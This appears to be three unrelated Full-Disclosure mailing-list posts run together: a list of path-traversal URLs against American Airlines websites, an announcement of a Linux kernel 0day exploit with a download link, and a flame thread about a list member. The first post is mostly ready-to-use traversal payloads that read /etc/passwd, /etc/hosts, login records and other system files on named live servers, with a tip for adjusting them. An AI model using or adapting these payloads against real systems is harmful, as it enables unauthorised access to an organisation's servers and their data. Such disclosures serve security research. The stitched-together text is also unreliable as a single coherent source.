http://www.americanairlines.de/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.fr/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.ie/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.in/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.it/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.jp/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.american-airlines.nl/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd https://www.aa.com.ve/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../etc/passwd https://www.americanairlines.com.au/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../etc/passwd https://www.americanairlines.com.ru/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../etc/passwd http://www.flagshiplounge.net/aa/i18nForward.do?locale=en_GBp= http://www.premiumcustomerservices.net/aa/i18nForward.do?locale=en_GBp= http://www.touraa.com/aa/i18nForward.do?p= and some senstive files i found https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/wtmpx https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/logadm.conf https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/messages https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../usr/lib/newsyslog https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../usr/sbin/logadm https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/lastlog https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/netconfig https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/syslog.conf https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/system https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/hosts screen shots http://i41.tinypic.com/fcns7t.jpg http://i25.tinypic.com/359z85z.jpg it's been reported and they don't feel like responding (if the page doesn't work try taking off a ../) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Linux 2.6.30+/SELinux/RHEL5 test kernel 0day, exploiting the unexploitable
Title says it all, exploit is at: http://grsecurity.net/~spender/cheddar_bay.tgz Everything is described and explained in the exploit.c file. I exploit a bug that by looking at the source is unexploitable; I defeat the null ptr dereference protection in the kernel on both systems with SELinux and those without. I proceed to disable SELinux/AppArmor/LSM/auditing Exploit works on both 32bit and 64bit kernels. Links to videos of the exploit in action are present in the exploit code. Greets to vendor-sec, -Brad - End forwarded message - - End forwarded message - signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v is posting as ant-sec
I didn't know n3td3v twitted about himself in the third person, thanks for giving me a good laugh today :) On Thu, Jul 16, 2009 at 6:00 PM, Ureleet urel...@gmail.com wrote: N3td3v made comment earlier today on Twitter about messing with the mind of his enemies. Gave him a dose of his own medicine. Now he is panicing. Twitter.com/n3td3v Got u kid. Fuxk off. O and don't follow him. He likes it. In fact, if u r a n3td3v follower unsub from his bullshit. I don't know if he's ant-sec, but I wuldnt b surprised. On Thursday, July 16, 2009, kfc.ru...@gmail.com kfc.ru...@gmail.com wrote: On Thu, Jul 16, 2009 at 2:54 PM, Ureleeturel...@gmail.com wrote: careful. n3td3v has found his way back onto the list. he is now posting as ant-sec. he is hacking and spreading disinformation on full-d. Interesting theory, but do you have any evidence that backs this up? I'm not so sure if n3td3v is back, though it would be funny. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- HONEY: I want to… put some powder on my nose. GEORGE: Martha, won’t you show her where we keep the euphemism? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
